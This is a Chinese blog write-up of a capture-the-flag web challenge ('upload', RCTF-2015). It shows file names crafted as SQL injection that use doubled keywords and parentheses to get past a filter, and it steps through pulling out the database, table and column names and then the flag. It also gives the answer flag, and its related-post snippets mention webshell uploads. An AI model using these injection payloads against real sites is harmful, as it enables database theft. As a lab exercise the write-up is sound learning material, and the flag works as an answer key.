攻防世界WEB进阶之upload

最新推荐文章于 2024-06-25 07:08:57 发布
最新推荐文章于 2024-06-25 07:08:57 发布
阅读量2.6k 收藏
点赞数 1
分类专栏: 攻防世界 文章标签: 攻防世界 web进阶 安全 渗透 红蓝
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/harry_c/article/details/98367671
版权

攻防世界WEB进阶之upload

第一步:分析

难度系数: 1星
题目来源: RCTF-2015
题目描述:暂无
脑洞很大的一题,首先题目什么都没给出,进入场景,注册自己的账号,登录出现文件上传,上传很多文件都显示文件后缀不行,如实使用burpsuite的intruder功能,遍历众多文件列表,发现只有jpg文件可以上传,好吧,那就只上传它。

第二步:实操

接着进行文件上传,上传之后,文件名回显并且给出了一个id值用户的ID。
至此已经毫无头绪了,遂百度,有相关文章显示了使用sql文件名注入的方式实现。本人经过复现,发现其实场景是禁止了空格的传输,尝试很多种代替空格的办法。最后尝试到括号是可行的。
harry_jpg’,‘1660’,‘1660’),((database()),‘1660’,‘1660’)#.jpg文件名可以回显出数据库的名称
“harry_’,‘1660’,‘1660’),((SELSELECTECT(table_name)FRFROMOM(information_schema.tables)WHERE(table_schema=‘web_upload’)),‘1660’,‘1660’)#.jpg” 查询表名称的回显语句,仅仅返回了harry_的文件名其他未返回。
其他语句暂时未拼出,等待大佬解答。

  • 分割线

以下内容摘自某人博客,因为无法复现,所以没有贴出链接
(1)查表名
lethe’,‘1660’,‘1660’),((selselectect(table_name) frfromom information_schema.tables where table_schema = ‘web_upload’),‘1660’,‘1660’)#.jpg
lethe’,‘1660’,‘1660’),((%20selselectect%20group_concat(table_name)%20frfromom%20information_schema.tables%20where%20table_schema=‘web_upload’),‘1660’,‘1660’)#.jpg
lethe’,‘1660’,‘1660’),((//selselectect//group_concat(table_name)//frfromom//information_schema.tables//where//table_schema=‘web_upload’),‘1660’,‘1660’)#.jpg
lethe’,‘1660’,‘1660’),(((1=0)selselectect(1=0)group_concat(table_name)(1=0)frfromom(1=0)information_schema.tables(1=0)where(1=0)table_schema=‘web_upload’),‘1660’,‘1660’)#.jpg
(2)查列名
lethe’,‘1660’,‘1660’),(( seselectlect group_concat(column_name) frfromom information_schema.columns where table_name= ‘hello_flag_is_here’ ),‘1660’,‘1660’)#.jpg
lethe’,‘1660’,‘1660’),((SELSELECTECT(GROUP_CONCAT(column_name))FRFROMOM(information_schema.columns)WHERE(table_name=‘hello_flag_is_here’),‘1660’,‘1660’)#.jpg
(3)查flag
lethe’,‘1660’,‘1660’),(( seselectlect i_am_flag frfromom hello_flag_is_here),‘1660’,‘1660’)#.jpg

第三步:答案

最终的flag为:RCTF{!!_@m_Th.e_F!lag}

Just_Do_Yite
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web高手进阶区 8分题 upload
闵行小鱼塘
08-28 488
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是upload的writeup
攻防世界 web进阶upload
weixin_42499640的博客
07-18 1458
这道题的大体思路是: 利用上传文件的文件名进行sql注入 这里先普及几个mysql函数的用法 1. CONV() 简单的来说这个函数就是用来进行***进制的转换***的 CONV(N,from_base,to_base) N是要转换的数据,from_base是原进制,to_base是目标进制。 select conv(16,10,16)...
攻防世界-高手进阶区之upload
Sacrifice_li的博客
06-12 594
进来页面如下: 然后就是正常的去注册一个用户,并且登录,我在这里也做了拦截,但是并没有什么有价值的信息: 登录进来之后是这样的一个页面,是文件上传(不过根据题目意思也是肯定可以知道的)。 我在这边也做了测试,只能够上传jpg文件,想要尝试php4,php5,php文件后缀都是不可以的。 然后我就在考虑是否是文件后缀截断上传,但是抓包截取内容之后并没有返回文件上传到哪里了,同时nikto和dirb扫描也没有发现什么有价值的信息。 接下来的话,就是看别人的wp了。不过说真的,第一次接触到.
攻防世界web进阶upload详解
hxhxhxhxx的博客
08-13 1936
攻防世界web进阶upload详解题目②CONV(N,from_base,to_base)③substr(string,start,length) 题目 进入页面是我们的注册 登录以后,发现可以文件上传 传完之后发现有回显,猜测可能是文件名注入 我们先进行一系列得上传测试,发现都不行 这时候,御剑发来了好消息, 这儿有一个include,classes的文件 我们使用burp康康有哪些过滤 发现被制为了空,我们猜一猜是双写绕过 下面解除文件名字注入 1.把文件名改成 a' +(selsele
攻防世界】CTF 网络安全学习 easyupload_攻防世界easyupload
最新发布
2401_84263282的博客
06-25 384
做这个题目前前后后一共花了五天的时间,因为本身不是一直有空,这道题首先要预先处理的问题很多。1. 先安装好中国蚁剑,教程整理如下,kali 零基础安装中国蚁剑2. 理解 **.user.ini**文件.user.ini 文件通常是与 PHP 配置相关的文件。在 PHP 应用程序中,用户可以通过 .user.ini 文件来自定义一些 PHP 的配置选项,以适应特定的应用需求。以下是一些关键点:位置: .user.ini 文件通常位于用户的网站目录下,可以影响到该目录及其子目录下的 PHP 执行环境。
ctf-攻防世界-webupload1
一只菜鸟的博客
11-01 511
一个很简单绕过的文件上传 打开靶场,发现一个很简单的上传点。在靶场地址后面加index.php,正常访问无跳转,加index.asp,报错且显示apache容器,看来绝对是php的网站了 burp开启代理,尝试上传php一句话,发现burp没发送请求包就提示文件类型不对,看来是前端验证文件类型。 右键查看源代码,果然是前端验证,只能上传jpg和png。 把写好的一句话后缀改为jpg或png,开启burp,在上传时抓包,将文件后缀改为php,成功绕过上传,并显示...
攻防世界CTF题:upload1
Aixwei的博客
04-11 1032
发现这里有个onchange事件,大概写了个前端的文件check,那我们在前端把它删掉再上传文件试试。发现了 disabled属性,我们把它删掉之后上传按键可以点击了,此时点击上传,可以看到上传成功。细看当前页面,发现上传按钮灰掉了,但是上传的文件还保留在前端并没有删除,此时再查看前端代码,最后,通过上传图片类型的木马,再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片,可能是前端验证文件格式,所以先看一下源代码,我们先正常上传一句话木马,被拦截后点击确定,
攻防世界web进阶upload
gongjingege的博客
08-15 455
这道题头都被打烂了。。。 题目为upload,第一反应文件上传,一句话菜刀就行了,结果,结果是注入。。。 (思维还是不灵活,脑洞还是不够大) 打开题目,先注册,这里没有注入 登录然后进入上传界面 写个一句话木马,上传 试了好几个,php,txt,都是文件扩展不对,只有jpg可以,应该是白名单过滤 同时界面将文件名回显 推测,将文件存入了数据库,显示文件名,当你输入查询数据库的语句时,是不是可以读取数据库 那么,结合大佬的wp,将文件名构造成sql查询语句(这个思路骚气。。。) 试着构造的时候,发现sel
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
upload(simple)
02-07
自己写的,感兴趣的可以下载看看,对初学者有用,可以起参考作用。
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
黑客攻防入门与进阶
12-16
黑客攻防入门与进阶..
XCTF攻防世界 MISC jpg rctf-2015解题记录
qq_35780686的博客
09-10 1477
XCTF攻防世界 MISC jpg 解题记录 最近一直在闲暇之余做一些misc的题来充实一下生活,解题的同时顺便做一下记录。 原题描述很简单 下载附件用foremost处理后得到两个文件 rar暴力破解后得到口令123456 解压后得到一个名字叫做ZmxhZy5jb2Rl的文件 base64解码后得到一长串16进制转换成文件后保存 因为ZmxhZy5jb2Rl解码为flag.code,所以拖入ida 发现有变化(但奈何本人并不会逆向,所以此时与答案擦肩而过…) 然后就是长达数小时的尝试,反码,补
【愚公系列】2023年06月 攻防世界-Webupload
时光隧道
06-20 6879
SQL注入的16进制绕过是指攻击者使用16进制编码绕过输入过滤和防御措施,从而执行恶意的SQL语句。例如,当输入过滤器检测到单引号时,它可能会将其替换为两个单引号,以避免SQL注入攻击。然而,攻击者可以使用16进制编码来绕过这一过滤器。这里的0x27是单引号的16进制编码,而0x2720656e7472616e63652070617373776f7264是" 'entrance password "的16进制编码,用来代替密码字段。攻击者可以使用类似的技术来绕过其他类型的输入过滤器和防御措施。
攻防世界-web-upload
wuh2333的博客
12-13 1112
攻防世界webupload,sql注入
【愚公系列】2023年05月 攻防世界-Webupload1)
热门推荐
时光隧道
01-25 3万+
文件上传漏洞是指攻击者通过上传含有恶意代码的文件,导致服务器被攻击的一种漏洞。当攻击者上传的文件没有经过检测或检查时,恶意代码便会被执行。在上传文件时,由于没有正确地验证上传文件的类型、大小和路径等相关信息,攻击者通过上传恶意代码的方式,可以控制并篡改Web应用程序,进而访问敏感信息。Webshell就是指攻击者在Web服务器上上传的恶意代码,一旦上传成功,则攻击者可以通过Web页面的方式,执行服务器上的各种操作,包括修改、删除、添加等。由于Webshell的具有隐藏性和隐蔽性,因此很难被发现和清除。
攻防世界upload1(web
yuanxu8877的博客
11-22 1089
攻防世界web-upload1
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞执行恶意代码或读取敏感文件。 文件包含漏洞分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。LFI漏洞发生在应用程序尝试包含本地文件时,而RFI漏洞则允许攻击者通过远程服务器包含外部文件。 为了防止文件包含漏洞,开发人员应该遵循以下最佳实践: 1. 永远不要信任用户输入。对用户提供的文件名、路径或URL进行严格的输入验证和过滤。 2. 使用白名单机制限制可包含的文件范围。只允许应用程序包含预定义的合法文件,而不是用户可控制的任意文件。 3. 避免使用动态包含,尽量使用静态包含。如果必须使用动态包含,确保只包含可信任的文件。 4. 对于本地文件包含漏洞,限制访问文件系统的权限。确保应用程序只能访问必要的文件,并将敏感文件放在可访问性受限的目录下。 5. 对于远程文件包含漏洞,禁止从远程服务器包含文件,或者使用安全的方法验证和限制远程文件的来源。 6. 定期更新和修补应用程序的漏洞,以确保及时修复已知的文件包含漏洞和其他安全问题。 这些是一些常见的防范文件包含漏洞的方法,但在实际开发过程中,还需要根据具体情况采取其他安全措施来保护应用程序免受攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值